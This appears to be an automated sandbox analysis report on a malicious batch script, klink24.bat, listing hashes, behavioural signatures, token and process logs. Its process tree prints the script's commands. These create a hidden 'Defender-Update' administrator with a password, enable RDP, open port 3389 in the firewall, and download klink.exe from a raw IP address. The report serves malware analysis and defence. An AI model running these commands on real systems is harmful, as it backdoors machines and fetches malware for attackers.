Analysis
-
max time kernel
198s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
11-10-2023 20:31
Static task
static1
Behavioral task
behavioral1
Sample
klink24.bat
Resource
win7-20230831-en
windows7-x64
6 signatures
150 seconds
Behavioral task
behavioral2
Sample
klink24.bat
Resource
win10v2004-20230915-en
windows10-2004-x64
7 signatures
150 seconds
General
-
Target
klink24.bat
-
Size
1KB
-
MD5
81b71168a37befd2646587909efa050b
-
SHA1
965a0db15b5cf77ea3c285d4f49d41b92a3d364d
-
SHA256
d51b466d9bd852e4b463096b9a922fe9e06e75e1258d274b576103498e578c01
-
SHA512
55e5a056d70b6799600c28d084593cdbde2eab836b33024d458f00971f03a87a076b760ee6b21913523996d20b695bc7f024eb59e46c03aa253708e5fd62339b
Score
9/10
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 2472 netsh.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1608 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2540 WMIC.exe Token: SeSecurityPrivilege 2540 WMIC.exe Token: SeTakeOwnershipPrivilege 2540 WMIC.exe Token: SeLoadDriverPrivilege 2540 WMIC.exe Token: SeSystemProfilePrivilege 2540 WMIC.exe Token: SeSystemtimePrivilege 2540 WMIC.exe Token: SeProfSingleProcessPrivilege 2540 WMIC.exe Token: SeIncBasePriorityPrivilege 2540 WMIC.exe Token: SeCreatePagefilePrivilege 2540 WMIC.exe Token: SeBackupPrivilege 2540 WMIC.exe Token: SeRestorePrivilege 2540 WMIC.exe Token: SeShutdownPrivilege 2540 WMIC.exe Token: SeDebugPrivilege 2540 WMIC.exe Token: SeSystemEnvironmentPrivilege 2540 WMIC.exe Token: SeRemoteShutdownPrivilege 2540 WMIC.exe Token: SeUndockPrivilege 2540 WMIC.exe Token: SeManageVolumePrivilege 2540 WMIC.exe Token: 33 2540 WMIC.exe Token: 34 2540 WMIC.exe Token: 35 2540 WMIC.exe Token: SeIncreaseQuotaPrivilege 2540 WMIC.exe Token: SeSecurityPrivilege 2540 WMIC.exe Token: SeTakeOwnershipPrivilege 2540 WMIC.exe Token: SeLoadDriverPrivilege 2540 WMIC.exe Token: SeSystemProfilePrivilege 2540 WMIC.exe Token: SeSystemtimePrivilege 2540 WMIC.exe Token: SeProfSingleProcessPrivilege 2540 WMIC.exe Token: SeIncBasePriorityPrivilege 2540 WMIC.exe Token: SeCreatePagefilePrivilege 2540 WMIC.exe Token: SeBackupPrivilege 2540 WMIC.exe Token: SeRestorePrivilege 2540 WMIC.exe Token: SeShutdownPrivilege 2540 WMIC.exe Token: SeDebugPrivilege 2540 WMIC.exe Token: SeSystemEnvironmentPrivilege 2540 WMIC.exe Token: SeRemoteShutdownPrivilege 2540 WMIC.exe Token: SeUndockPrivilege 2540 WMIC.exe Token: SeManageVolumePrivilege 2540 WMIC.exe Token: 33 2540 WMIC.exe Token: 34 2540 WMIC.exe Token: 35 2540 WMIC.exe Token: SeIncreaseQuotaPrivilege 2524 WMIC.exe Token: SeSecurityPrivilege 2524 WMIC.exe Token: SeTakeOwnershipPrivilege 2524 WMIC.exe Token: SeLoadDriverPrivilege 2524 WMIC.exe Token: SeSystemProfilePrivilege 2524 WMIC.exe Token: SeSystemtimePrivilege 2524 WMIC.exe Token: SeProfSingleProcessPrivilege 2524 WMIC.exe Token: SeIncBasePriorityPrivilege 2524 WMIC.exe Token: SeCreatePagefilePrivilege 2524 WMIC.exe Token: SeBackupPrivilege 2524 WMIC.exe Token: SeRestorePrivilege 2524 WMIC.exe Token: SeShutdownPrivilege 2524 WMIC.exe Token: SeDebugPrivilege 2524 WMIC.exe Token: SeSystemEnvironmentPrivilege 2524 WMIC.exe Token: SeRemoteShutdownPrivilege 2524 WMIC.exe Token: SeUndockPrivilege 2524 WMIC.exe Token: SeManageVolumePrivilege 2524 WMIC.exe Token: 33 2524 WMIC.exe Token: 34 2524 WMIC.exe Token: 35 2524 WMIC.exe Token: SeIncreaseQuotaPrivilege 2524 WMIC.exe Token: SeSecurityPrivilege 2524 WMIC.exe Token: SeTakeOwnershipPrivilege 2524 WMIC.exe Token: SeLoadDriverPrivilege 2524 WMIC.exe -
Suspicious use of WriteProcessMemory 45 IoCs
description pid Process procid_target PID 2636 wrote to memory of 2796 2636 cmd.exe 29 PID 2636 wrote to memory of 2796 2636 cmd.exe 29 PID 2636 wrote to memory of 2796 2636 cmd.exe 29 PID 2796 wrote to memory of 2540 2796 cmd.exe 30 PID 2796 wrote to memory of 2540 2796 cmd.exe 30 PID 2796 wrote to memory of 2540 2796 cmd.exe 30 PID 2796 wrote to memory of 2528 2796 cmd.exe 31 PID 2796 wrote to memory of 2528 2796 cmd.exe 31 PID 2796 wrote to memory of 2528 2796 cmd.exe 31 PID 2636 wrote to memory of 2516 2636 cmd.exe 33 PID 2636 wrote to memory of 2516 2636 cmd.exe 33 PID 2636 wrote to memory of 2516 2636 cmd.exe 33 PID 2516 wrote to memory of 2524 2516 cmd.exe 34 PID 2516 wrote to memory of 2524 2516 cmd.exe 34 PID 2516 wrote to memory of 2524 2516 cmd.exe 34 PID 2516 wrote to memory of 2536 2516 cmd.exe 35 PID 2516 wrote to memory of 2536 2516 cmd.exe 35 PID 2516 wrote to memory of 2536 2516 cmd.exe 35 PID 2636 wrote to memory of 2364 2636 cmd.exe 36 PID 2636 wrote to memory of 2364 2636 cmd.exe 36 PID 2636 wrote to memory of 2364 2636 cmd.exe 36 PID 2364 wrote to memory of 3044 2364 net.exe 37 PID 2364 wrote to memory of 3044 2364 net.exe 37 PID 2364 wrote to memory of 3044 2364 net.exe 37 PID 2636 wrote to memory of 2916 2636 cmd.exe 38 PID 2636 wrote to memory of 2916 2636 cmd.exe 38 PID 2636 wrote to memory of 2916 2636 cmd.exe 38 PID 2916 wrote to memory of 2884 2916 net.exe 39 PID 2916 wrote to memory of 2884 2916 net.exe 39 PID 2916 wrote to memory of 2884 2916 net.exe 39 PID 2636 wrote to memory of 3012 2636 cmd.exe 40 PID 2636 wrote to memory of 3012 2636 cmd.exe 40 PID 2636 wrote to memory of 3012 2636 cmd.exe 40 PID 3012 wrote to memory of 2340 3012 net.exe 41 PID 3012 wrote to memory of 2340 3012 net.exe 41 PID 3012 wrote to memory of 2340 3012 net.exe 41 PID 2636 wrote to memory of 2232 2636 cmd.exe 42 PID 2636 wrote to memory of 2232 2636 cmd.exe 42 PID 2636 wrote to memory of 2232 2636 cmd.exe 42 PID 2636 wrote to memory of 2472 2636 cmd.exe 43 PID 2636 wrote to memory of 2472 2636 cmd.exe 43 PID 2636 wrote to memory of 2472 2636 cmd.exe 43 PID 2636 wrote to memory of 1608 2636 cmd.exe 44 PID 2636 wrote to memory of 1608 2636 cmd.exe 44 PID 2636 wrote to memory of 1608 2636 cmd.exe 44
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\klink24.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="2⤵
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\System32\Wbem\WMIC.exewmic Group Where "SID = 'S-1-5-32-544'" Get Name /Value3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2540
-
-
C:\Windows\system32\find.exeFind "="3⤵PID:2528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="2⤵
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\System32\Wbem\WMIC.exewmic Group Where "SID = 'S-1-5-32-555'" Get Name /Value3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2524
-
-
C:\Windows\system32\find.exeFind "="3⤵PID:2536
-
-
-
C:\Windows\system32\net.exenet user Defender-Update defen2!AW7W21 /add /expires:never2⤵
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Defender-Update defen2!AW7W21 /add /expires:never3⤵PID:3044
-
-
-
C:\Windows\system32\net.exenet localgroup Administrators Defender-Update /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators Defender-Update /ADD3⤵PID:2884
-
-
-
C:\Windows\system32\net.exenet localgroup "Remote Desktop Users" Defender-Update /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" Defender-Update /ADD3⤵PID:2340
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f2⤵PID:2232
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow2⤵
- Modifies Windows Firewall
PID:2472
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell iwr http://78.47.123.155:8233/klink.exe -OutFile c:\programdata\klink.exe2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1608
-